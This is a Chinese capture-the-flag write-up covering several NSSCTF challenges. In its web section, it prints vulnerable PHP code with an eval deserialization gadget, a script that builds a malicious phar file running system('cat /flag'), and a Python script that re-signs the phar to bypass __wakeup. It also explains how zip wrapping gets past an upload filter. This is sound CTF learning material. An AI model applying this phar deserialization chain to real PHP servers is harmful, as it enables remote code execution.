NSSCTF部分复现
NSSCTF
WEB
ez_rce
看版本,百度一下有目录穿越漏洞
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用_Tauil的博客-CSDN博客
构造payload
这里制造了一个文件夹迷宫,仅存在四层
1zweb(revenge)
一个文件上传的页面,可以查看文件
先查看一下基本的文件,index.php,uoload.php,等
index.php
<?phpclass LoveNss{public $ljt;public $dky;public $cmd;public function __construct(){$this->ljt="ljt";$this->dky="dky";phpinfo();}public function __destruct(){if($this->ljt==="Misc"&&$this->dky==="Re")eval($this->cmd);}public function __wakeup(){$this->ljt="Re";$this->dky="Misc";}
}
$file=$_POST['file'];
if(isset($_POST['file'])){echo file_get_contents($file);
}
?>
file_get_contents读phar文件时能能触发返序列化漏洞,明显要让dky=“Re”,ljt=“Misc”,执行cmd的任意代码
pop
<?phpunlink('phar.phar');class LoveNss{public $ljt;public $dky;public $cmd;}$a=new LoveNss();$a->cmd="system('cat /flag');";$a->ljt="Misc";$a->dky="Re";$phar = new Phar('phar.phar');$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');$phar->setMetadata($a);$phar->addFromString('1.txt','dky');
?>
运行得到一个phar文件,我们还要绕过wakeup函数,
改完之后要修改签名
from hashlib import sha1
f = open('../phar.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('22.phar', 'wb').write(newf) # 写入新文件
再看upload.php
<?php
if ($_FILES["file"]["error"] > 0){echo "上传异常";
}
else{$allowedExts = array("gif", "jpeg", "jpg", "png");$temp = explode(".", $_FILES["file"]["name"]);$extension = end($temp);if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){$content=file_get_contents($_FILES["file"]["tmp_name"]);$pos = strpos($content, "__HALT_COMPILER();");if(gettype($pos)==="integer"){echo "ltj一眼就发现了phar";}else{if (file_exists("./upload/" . $_FILES["file"]["name"])){echo $_FILES["file"]["name"] . " 文件已经存在";}else{$myfile = fopen("./upload/".$_FILES["file"]["name"], "w");fwrite($myfile, $content);fclose($myfile);echo "上传成功 ./upload/".$_FILES["file"]["name"];}}}else{echo "dky不喜欢这个文件 .".$extension;}
}
?>
后缀必须是图片,且内容不能出现phar标志
可以压缩zip绕过
上传后用phar伪协议读取
MISC
Type Message
电话拨号
用九键拼出来是NSSCTF,后面三个音频都一样,拼起来就是flag
Knight’S Tour
拿到ChessBoard.zip压缩包,发现打不开,拖进010里看一看
好家伙,zip竟然是rar的头,直接修改头为504b0304 就可以正常解压解压后得到图片
观察分析,发现上面8x8的格子中正好对应下面的字母,应该是照顺序打乱了,结合题目Knight’s Tour,可以找到这样一个游戏根据游戏规则可以得到下面结果这里跟据第一列全为红色,每排有8个,只有两种颜色可以推测(脑洞)出红色代表0 黄色代表 1解出来为Ch1v@lry,即为flag
NSSCTF部分复现相关推荐
- [NSSCTF][SCTF 2021]WEB复现
感谢NSSCTF提供复现环境 loginme middleware.go package middlewareimport ("github.com/gin-gonic/gin" ...
- 国赛ezpop题目复现(tp6)
前言 五月份国赛题目涉及到tp6的反序列化,当时也是在网上找的exp打,不知道其中的链子是怎么构造的,前段时间也接触了tp框架的反序列化,利用这次机会好好复现一下,弄懂其中的原理.在ctfshow和n ...
- [CTF]SCTF2021 WEB复现(详细版)
前言 认真复现还是收获挺多的,做这些就算看wp也会卡很久的题目才容易提高.最后感谢下NSSCTF平台提供的靶机,虽然flag只有一半 Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造 ...
- Facebook 发布深度学习工具包 PyTorch Hub,让论文复现变得更容易
近日,PyTorch 社区发布了一个深度学习工具包 PyTorchHub, 帮助机器学习工作者更快实现重要论文的复现工作.PyTorchHub 由一个预训练模型仓库组成,专门用于提高研究工作的复现性以 ...
- 【目标检测】yolo系列:从yolov1到yolov5之YOLOv1详解及复现
检测器通常能够被分为两类,一类是two-stage检测器,最具代表的为faster R-CNN:另一类是one-stage检测器,包括YOLO,SSD等.一般来说,two-stage检测器具有高定位和 ...
- CV算法复现(分类算法2/6):AlexNet(2012年 Hinton组)
致谢:霹雳吧啦Wz:https://space.bilibili.com/18161609 目录 致谢:霹雳吧啦Wz:https://space.bilibili.com/18161609 1 本次要 ...
- 【神经网络】(17) EfficientNet 代码复现,网络解析,附Tensorflow完整代码
各位同学好,今天和大家分享一下如何使用 Tensorflow 复现 EfficientNet 卷积神经网络模型. EfficientNet 的网络结构和 MobileNetV3 比较相似,建议大家在学 ...
- 【神经网络】(16) MobileNetV3 代码复现,网络解析,附Tensorflow完整代码
各位同学好,今天和大家分享一下如何使用 Tensorflow 构建 MobileNetV3 轻量化网络模型. MobileNetV3 做了如下改动(1)更新了V2中的逆转残差结构:(2)使用NAS搜索 ...
- 【神经网络】(15) Xception 代码复现,网络解析,附Tensorflow完整代码
各位同学好,今天和大家分享一下如何使用 Tensorflow 构建 Xception 神经网络模型. 在前面章节中,我已经介绍了很多种轻量化卷积神经网络模型,感兴趣的可以看一下:https://blo ...
最新文章
- 分享几段祖传的 Python 代码,拿来直接使用!
- 深圳招聘 | 元象唯思:决策AI研发工程师、NLP算法工程师(可实习)
- 【数据库系统概论】考研第一部分重点分析【1.1】
- C#中Tuple的使用
- java厨房_Java多线程基础
- 免密登录关闭_微信最新提醒:这个设置再不关闭,你的微信账号就能被别人“免密登录”!...
- 关于AD域账户和组的管理技巧
- 基类Object的子类有哪些以及字符串和数组的方法
- 搭建自己的企业QQ [2007年6月15日]
- spring data jpa 查询部分字段列名无效问题
- thinkphp group count连用
- html 右边是iframe 左右结构_HTML iframe 用法总结收藏
- 效率直接起飞的PPT技巧,你知道吗
- Maven Helper插件下载
- matlab 光斑质心算法,一种光斑提取及其质心确定的方法技术
- 定制Android关机界面
- 二极管在LDO电路中的几种常见用法
- xff_referer知识
- 【IOS】IOS工程自动打包并发布脚本实现
- 【湖上日出】从零开始通过拖拉拽可视化的方式制作动态风景,免手写CSS
热门文章
- 用纯Python就能写一个漂亮的网页
- mysql模糊查询之索引优化
- SAP MM框架协议,合同
- 学习编程是否真的有用?
- excel如何给文件加密、工作簿加密、工作表加密(office2019)
- 小米android10升级版本,小米9 MIUI安卓10开发版已开始推送,建议大家不要去升级!...
- 罗大佑的童年用计算机咋弹,罗大佑《童年》吉他弹奏教学-520吉他网
- Mysql查询获取过去一年,最后一天,每月,每月的数据
- vagrant给vmbox创建虚拟机及docker安装mysql和redis
- 十一黄金周旅游线路排行榜(图文)